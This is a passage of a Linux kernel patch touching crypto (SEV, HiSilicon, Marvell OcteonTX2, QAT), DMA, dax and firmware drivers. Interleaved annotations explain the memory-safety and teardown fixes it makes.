++		clflush_cache_range(sev_es_tmr, SEV_ES_TMR_SIZE);
++	else
+ 		dev_warn(sev->dev,
+ 			 "SEV: TMR allocation failed, SEV-ES support unavailable\n");
+ 
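[Annotation] Two small hardening patterns show up in the sev-dev hunks: a user-controlled allocation size gets __GFP_NOWARN so an oversized request fails with -ENOMEM instead of triggering a page-allocator warning, and memory about to be handed to firmware is flushed out of the CPU caches first so the firmware sees the written contents. The allocation side, in isolation:

	/*
	 * input.length comes from userspace and may exceed what the page
	 * allocator can serve; fail quietly rather than WARN.
	 */
	id_blob = kzalloc(input.length, GFP_KERNEL | __GFP_NOWARN);
	if (!id_blob)
		return -ENOMEM;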
+diff --git a/drivers/crypto/hisilicon/sgl.c b/drivers/crypto/hisilicon/sgl.c
+index 2b6f2281cfd6c..0974b00414050 100644
+--- a/drivers/crypto/hisilicon/sgl.c
++++ b/drivers/crypto/hisilicon/sgl.c
+@@ -124,9 +124,8 @@ err_free_mem:
+ 	for (j = 0; j < i; j++) {
+ 		dma_free_coherent(dev, block_size, block[j].sgl,
+ 				  block[j].sgl_dma);
+-		memset(block + j, 0, sizeof(*block));
+ 	}
+-	kfree(pool);
++	kfree_sensitive(pool);
+ 	return ERR_PTR(-ENOMEM);
+ }
+ EXPORT_SYMBOL_GPL(hisi_acc_create_sgl_pool);
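[Annotation] The sgl.c cleanup swaps kfree() for kfree_sensitive() on the error path, so the pool bookkeeping is scrubbed before the slab gets the memory back (which also makes the per-block memset redundant). kfree_sensitive(p) behaves roughly like the following, with the real helper also tolerating NULL:

	memzero_explicit(p, ksize(p));
	kfree(p);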
+diff --git a/drivers/crypto/marvell/octeontx2/Makefile b/drivers/crypto/marvell/octeontx2/Makefile
+index 965297e969546..f0f2942c1d278 100644
+--- a/drivers/crypto/marvell/octeontx2/Makefile
++++ b/drivers/crypto/marvell/octeontx2/Makefile
+@@ -1,11 +1,10 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptpf.o rvu_cptvf.o
++obj-$(CONFIG_CRYPTO_DEV_OCTEONTX2_CPT) += rvu_cptcommon.o rvu_cptpf.o rvu_cptvf.o
+ 
++rvu_cptcommon-objs := cn10k_cpt.o otx2_cptlf.o otx2_cpt_mbox_common.o
+ rvu_cptpf-objs := otx2_cptpf_main.o otx2_cptpf_mbox.o \
+-		  otx2_cpt_mbox_common.o otx2_cptpf_ucode.o otx2_cptlf.o \
+-		  cn10k_cpt.o otx2_cpt_devlink.o
+-rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o otx2_cptlf.o \
+-		  otx2_cpt_mbox_common.o otx2_cptvf_reqmgr.o \
+-		  otx2_cptvf_algs.o cn10k_cpt.o
++		  otx2_cptpf_ucode.o otx2_cpt_devlink.o
++rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o \
++		  otx2_cptvf_reqmgr.o otx2_cptvf_algs.o
+ 
+ ccflags-y += -I$(srctree)/drivers/net/ethernet/marvell/octeontx2/af
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+index 1499ef75b5c22..93d22b3289919 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+@@ -7,6 +7,9 @@
+ #include "otx2_cptlf.h"
+ #include "cn10k_cpt.h"
+ 
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf);
++
+ static struct cpt_hw_ops otx2_hw_ops = {
+ 	.send_cmd = otx2_cpt_send_cmd,
+ 	.cpt_get_compcode = otx2_cpt_get_compcode,
+@@ -19,8 +22,8 @@ static struct cpt_hw_ops cn10k_hw_ops = {
+ 	.cpt_get_uc_compcode = cn10k_cpt_get_uc_compcode,
+ };
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf)
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf)
+ {
+ 	void __iomem *lmtline = lf->lmtline;
+ 	u64 val = (lf->slot & 0x7FF);
+@@ -68,6 +71,7 @@ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptpf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ {
+@@ -91,3 +95,4 @@ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptvf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+index c091392b47e0f..aaefc7e38e060 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+@@ -28,8 +28,6 @@ static inline u8 otx2_cpt_get_uc_compcode(union otx2_cpt_res_s *result)
+ 	return ((struct cn9k_cpt_res_s *)result)->uc_compcode;
+ }
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf);
+ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf);
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf);
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+index 5012b7e669f07..6019066a6451a 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+@@ -145,8 +145,6 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox,
+ 				  struct pci_dev *pdev);
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr);
+ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			      u64 reg, u64 val, int blkaddr);
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+index a317319696eff..115997475beb3 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+@@ -19,6 +19,7 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+@@ -36,14 +37,17 @@ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_ready_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_af_reg_requests, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr)
++static int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox,
++				    struct pci_dev *pdev, u64 reg,
++				    u64 *val, int blkaddr)
+ {
+ 	struct cpt_rd_wr_reg_msg *reg_msg;
+ 
+@@ -91,6 +95,7 @@ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_add_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			 u64 reg, u64 *val, int blkaddr)
+@@ -103,6 +108,7 @@ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_read_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			  u64 reg, u64 val, int blkaddr)
+@@ -115,6 +121,7 @@ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_attach_rscrs_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -170,6 +177,7 @@ int otx2_cpt_detach_rsrcs_msg(struct otx2_cptlfs_info *lfs)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_detach_rsrcs_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -202,6 +210,7 @@ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_msix_offset_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ {
+@@ -216,3 +225,4 @@ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ 
+ 	return otx2_mbox_check_rsp_msgs(mbox, 0);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_sync_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+index c8350fcd60fab..71e5f79431afa 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+@@ -274,6 +274,8 @@ void otx2_cptlf_unregister_interrupts(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	cptlf_disable_intrs(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_unregister_interrupts,
++		     CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ static int cptlf_do_register_interrrupts(struct otx2_cptlfs_info *lfs,
+ 					 int lf_num, int irq_offset,
+@@ -321,6 +323,7 @@ free_irq:
+ 	otx2_cptlf_unregister_interrupts(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_register_interrupts, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -334,6 +337,7 @@ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ 		free_cpumask_var(lfs->lf[slot].affinity_mask);
+ 	}
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_free_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_set_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -366,6 +370,7 @@ free_affinity_mask:
+ 	otx2_cptlf_free_irqs_affinity(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_set_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_init(struct otx2_cptlfs_info *lfs, u8 eng_grp_mask, int pri,
+ 		    int lfs_num)
+@@ -422,6 +427,7 @@ clear_lfs_num:
+ 	lfs->lfs_num = 0;
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ {
+@@ -431,3 +437,8 @@ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_shutdown, CRYPTO_DEV_OCTEONTX2_CPT);
++
++MODULE_AUTHOR("Marvell");
++MODULE_DESCRIPTION("Marvell RVU CPT Common module");
++MODULE_LICENSE("GPL");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+index a402ccfac5577..ddf6e913c1c45 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+@@ -831,6 +831,8 @@ static struct pci_driver otx2_cpt_pci_driver = {
+ 
+ module_pci_driver(otx2_cpt_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION(OTX2_CPT_DRV_STRING);
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+index 3411e664cf50c..392e9fee05e81 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+@@ -429,6 +429,8 @@ static struct pci_driver otx2_cptvf_pci_driver = {
+ 
+ module_pci_driver(otx2_cptvf_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION("Marvell RVU CPT Virtual Function Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/qat/qat_common/qat_algs.c b/drivers/crypto/qat/qat_common/qat_algs.c
+index b4b9f0aa59b98..b61ada5591586 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_algs.c
+@@ -435,8 +435,8 @@ static void qat_alg_skcipher_init_com(struct qat_alg_skcipher_ctx *ctx,
+ 	} else if (aes_v2_capable && mode == ICP_QAT_HW_CIPHER_CTR_MODE) {
+ 		ICP_QAT_FW_LA_SLICE_TYPE_SET(header->serv_specif_flags,
+ 					     ICP_QAT_FW_LA_USE_UCS_SLICE_TYPE);
+-		keylen = round_up(keylen, 16);
+ 		memcpy(cd->ucs_aes.key, key, keylen);
++		keylen = round_up(keylen, 16);
+ 	} else {
+ 		memcpy(cd->aes.key, key, keylen);
+ 	}
+diff --git a/drivers/crypto/ux500/Kconfig b/drivers/crypto/ux500/Kconfig
+index dcbd7404768f1..ac89cd2de12a1 100644
+--- a/drivers/crypto/ux500/Kconfig
++++ b/drivers/crypto/ux500/Kconfig
+@@ -15,8 +15,7 @@ config CRYPTO_DEV_UX500_HASH
+ 	  Depends on UX500/STM DMA if running in DMA mode.
+ 
+ config CRYPTO_DEV_UX500_DEBUG
+-	bool "Activate ux500 platform debug-mode for crypto and hash block"
+-	depends on CRYPTO_DEV_UX500_CRYP || CRYPTO_DEV_UX500_HASH
++	bool "Activate debug-mode for UX500 crypto driver for HASH block"
++	depends on CRYPTO_DEV_UX500_HASH
+ 	help
+-	  Say Y if you want to add debug prints to ux500_hash and
+-	  ux500_cryp devices.
++	  Say Y if you want to add debug prints to ux500_hash devices.
+diff --git a/drivers/cxl/pmem.c b/drivers/cxl/pmem.c
+index 08bbbac9a6d08..71cfa1fdf9027 100644
+--- a/drivers/cxl/pmem.c
++++ b/drivers/cxl/pmem.c
+@@ -76,6 +76,7 @@ static int cxl_nvdimm_probe(struct device *dev)
+ 		return rc;
+ 
+ 	set_bit(NDD_LABELING, &flags);
++	set_bit(NDD_REGISTER_SYNC, &flags);
+ 	set_bit(ND_CMD_GET_CONFIG_SIZE, &cmd_mask);
+ 	set_bit(ND_CMD_GET_CONFIG_DATA, &cmd_mask);
+ 	set_bit(ND_CMD_SET_CONFIG_DATA, &cmd_mask);
+diff --git a/drivers/dax/bus.c b/drivers/dax/bus.c
+index 1dad813ee4a69..c64e7076537cb 100644
+--- a/drivers/dax/bus.c
++++ b/drivers/dax/bus.c
+@@ -427,8 +427,8 @@ static void unregister_dev_dax(void *dev)
+ 	dev_dbg(dev, "%s\n", __func__);
+ 
+ 	kill_dev_dax(dev_dax);
+-	free_dev_dax_ranges(dev_dax);
+ 	device_del(dev);
++	free_dev_dax_ranges(dev_dax);
+ 	put_device(dev);
+ }
+ 
+diff --git a/drivers/dax/kmem.c b/drivers/dax/kmem.c
+index 4852a2dbdb278..4aa758a2b3d1b 100644
+--- a/drivers/dax/kmem.c
++++ b/drivers/dax/kmem.c
+@@ -146,7 +146,7 @@ static int dev_dax_kmem_probe(struct dev_dax *dev_dax)
+ 		if (rc) {
+ 			dev_warn(dev, "mapping%d: %#llx-%#llx memory add failed\n",
+ 					i, range.start, range.end);
+-			release_resource(res);
++			remove_resource(res);
+ 			kfree(res);
+ 			data->res[i] = NULL;
+ 			if (mapped)
+@@ -195,7 +195,7 @@ static void dev_dax_kmem_remove(struct dev_dax *dev_dax)
+ 
+ 		rc = remove_memory(range.start, range_len(&range));
+ 		if (rc == 0) {
+-			release_resource(data->res[i]);
++			remove_resource(data->res[i]);
+ 			kfree(data->res[i]);
+ 			data->res[i] = NULL;
+ 			success++;
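[Annotation] The dax/kmem change pairs the teardown with how the resource was published: remove_resource() is the documented inverse for resources inserted into the iomem tree and splices any remaining child resources back up to the parent, whereas release_resource() drops the node together with its subtree, leaving children (here, hot-added System RAM entries) dangling. The pairing, schematically:

	insert_resource(&iomem_resource, res);	/* setup */
	/* ... */
	remove_resource(res);			/* teardown: re-parents children */
	kfree(res);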
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index b6d48d54f42fc..7b95f07c6f1af 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -245,7 +245,7 @@ config FSL_RAID
+ 
+ config HISI_DMA
+ 	tristate "HiSilicon DMA Engine support"
+-	depends on ARM64 || COMPILE_TEST
++	depends on ARCH_HISI || COMPILE_TEST
+ 	depends on PCI_MSI
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index bf85aa0979ecb..152c5d98524d7 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -325,8 +325,6 @@ dma_chan_tx_status(struct dma_chan *dchan, dma_cookie_t cookie,
+ 		len = vd_to_axi_desc(vdesc)->hw_desc[0].len;
+ 		completed_length = completed_blocks * len;
+ 		bytes = length - completed_length;
+-	} else {
+-		bytes = vd_to_axi_desc(vdesc)->length;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index c54b24ff5206a..52bdf04aff511 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -455,6 +455,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			} else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->dar = dst_addr;
+ 			}
+ 		} else {
+ 			burst->dar = dst_addr;
+@@ -470,6 +472,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			}  else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->sar = src_addr;
+ 			}
+ 		}
+ 
+diff --git a/drivers/dma/dw-edma/dw-edma-v0-core.c b/drivers/dma/dw-edma/dw-edma-v0-core.c
+index 77e6cfe52e0a3..a3816ba632851 100644
+--- a/drivers/dma/dw-edma/dw-edma-v0-core.c
++++ b/drivers/dma/dw-edma/dw-edma-v0-core.c
+@@ -192,7 +192,7 @@ static inline void writeq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ static inline u64 readq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ 			   const void __iomem *addr)
+ {
+-	u32 value;
++	u64 value;
+ 
+ 	if (dw->chip->mf == EDMA_MF_EDMA_LEGACY) {
+ 		u32 viewport_sel;
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 29dbb0f52e186..8b4573dc7ecc5 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -701,7 +701,7 @@ static void idxd_groups_clear_state(struct idxd_device *idxd)
+ 		group->use_rdbuf_limit = false;
+ 		group->rdbufs_allowed = 0;
+ 		group->rdbufs_reserved = 0;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/init.c b/drivers/dma/idxd/init.c
+index 529ea09c90940..e63b0c674d883 100644
+--- a/drivers/dma/idxd/init.c
++++ b/drivers/dma/idxd/init.c
+@@ -295,7 +295,7 @@ static int idxd_setup_groups(struct idxd_device *idxd)
+ 		}
+ 
+ 		idxd->groups[i] = group;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 3229dfc786507..18cd8151dee02 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -387,7 +387,7 @@ static ssize_t group_traffic_class_a_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+@@ -429,7 +429,7 @@ static ssize_t group_traffic_class_b_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+diff --git a/drivers/dma/ptdma/ptdma-dmaengine.c b/drivers/dma/ptdma/ptdma-dmaengine.c
+index cc22d162ce250..1aa65e5de0f3a 100644
+--- a/drivers/dma/ptdma/ptdma-dmaengine.c
++++ b/drivers/dma/ptdma/ptdma-dmaengine.c
+@@ -254,7 +254,7 @@ static void pt_issue_pending(struct dma_chan *dma_chan)
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+ 
+ 	/* If there was nothing active, start processing */
+-	if (engine_is_idle)
++	if (engine_is_idle && desc)
+ 		pt_cmd_callback(desc, 0);
+ }
+ 
+diff --git a/drivers/dma/sf-pdma/sf-pdma.c b/drivers/dma/sf-pdma/sf-pdma.c
+index 6b524eb6bcf3a..e578ad5569494 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.c
++++ b/drivers/dma/sf-pdma/sf-pdma.c
+@@ -96,7 +96,6 @@ sf_pdma_prep_dma_memcpy(struct dma_chan *dchan,	dma_addr_t dest, dma_addr_t src,
+ 	if (!desc)
+ 		return NULL;
+ 
+-	desc->in_use = true;
+ 	desc->dirn = DMA_MEM_TO_MEM;
+ 	desc->async_tx = vchan_tx_prep(&chan->vchan, &desc->vdesc, flags);
+ 
+@@ -290,7 +289,7 @@ static void sf_pdma_free_desc(struct virt_dma_desc *vdesc)
+ 	struct sf_pdma_desc *desc;
+ 
+ 	desc = to_sf_pdma_desc(vdesc);
+-	desc->in_use = false;
++	kfree(desc);
+ }
+ 
+ static void sf_pdma_donebh_tasklet(struct tasklet_struct *t)
+diff --git a/drivers/dma/sf-pdma/sf-pdma.h b/drivers/dma/sf-pdma/sf-pdma.h
+index dcb3687bd5da2..5c398a83b491a 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.h
++++ b/drivers/dma/sf-pdma/sf-pdma.h
+@@ -78,7 +78,6 @@ struct sf_pdma_desc {
+ 	u64				src_addr;
+ 	struct virt_dma_desc		vdesc;
+ 	struct sf_pdma_chan		*chan;
+-	bool				in_use;
+ 	enum dma_transfer_direction	dirn;
+ 	struct dma_async_tx_descriptor *async_tx;
+ };
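[Annotation] The sf-pdma hunks fix a descriptor leak by giving the descriptors a real owner: they were allocated per-prep but the .desc_free callback only cleared an in_use flag, so the memory was never returned. With virt-dma the framework invokes .desc_free once it is finished with a descriptor, and the kfree() belongs there:

static void demo_free_desc(struct virt_dma_desc *vdesc)
{
	/* container_of back to the driver descriptor; name hypothetical */
	struct demo_desc *desc = to_demo_desc(vdesc);

	kfree(desc);
}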
+diff --git a/drivers/firmware/dmi-sysfs.c b/drivers/firmware/dmi-sysfs.c
+index 66727ad3361b9..402217c570333 100644
+--- a/drivers/firmware/dmi-sysfs.c
++++ b/drivers/firmware/dmi-sysfs.c
+@@ -603,16 +603,16 @@ static void __init dmi_sysfs_register_handle(const struct dmi_header *dh,
+ 	*ret = kobject_init_and_add(&entry->kobj, &dmi_sysfs_entry_ktype, NULL,
+ 				    "%d-%d", dh->type, entry->instance);
+ 
+-	if (*ret) {
+-		kobject_put(&entry->kobj);
+-		return;
+-	}
+-
+ 	/* Thread on the global list for cleanup */
+ 	spin_lock(&entry_list_lock);
+ 	list_add_tail(&entry->list, &entry_list);
+ 	spin_unlock(&entry_list_lock);
+ 
++	if (*ret) {
++		kobject_put(&entry->kobj);
++		return;
++	}
++
+ 	/* Handle specializations by type */
+ 	switch (dh->type) {
+ 	case DMI_ENTRY_SYSTEM_EVENT_LOG:
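
[The reorder above follows the kobject error rule: once kobject_init_and_add() has run, a failure must still be unwound with kobject_put() so the ktype's release callback frees the entry. Threading the entry onto the global list first matters because the release callback unlinks it; that reading is hedged here, since the release body is outside this hunk. A sketch of the release side this ordering protects, names hypothetical:

	static void entry_release(struct kobject *kobj)
	{
		struct entry *e = container_of(kobj, struct entry, kobj);

		spin_lock(&entry_list_lock);
		list_del(&e->list);	/* only valid if the entry was listed */
		spin_unlock(&entry_list_lock);
		kfree(e);
	}
]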
+diff --git a/drivers/firmware/google/framebuffer-coreboot.c b/drivers/firmware/google/framebuffer-coreboot.c
+index c6dcc1ef93acf..c323a818805cc 100644
+--- a/drivers/firmware/google/framebuffer-coreboot.c
++++ b/drivers/firmware/google/framebuffer-coreboot.c
+@@ -43,9 +43,7 @@ static int framebuffer_probe(struct coreboot_device *dev)
+ 		    fb->green_mask_pos     == formats[i].green.offset &&
+ 		    fb->green_mask_size    == formats[i].green.length &&
+ 		    fb->blue_mask_pos      == formats[i].blue.offset &&
+-		    fb->blue_mask_size     == formats[i].blue.length &&
+-		    fb->reserved_mask_pos  == formats[i].transp.offset &&
+-		    fb->reserved_mask_size == formats[i].transp.length)
++		    fb->blue_mask_size     == formats[i].blue.length)
+ 			pdata.format = formats[i].name;
+ 	}
+ 	if (!pdata.format)
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index 447ee4ea5c903..f78249fe2512a 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -108,9 +108,10 @@ bool psci_power_state_is_valid(u32 state)
+ 	return !(state & ~valid_mask);
+ }
+ 
+-static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_hvc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -118,9 +119,10 @@ static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_smc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
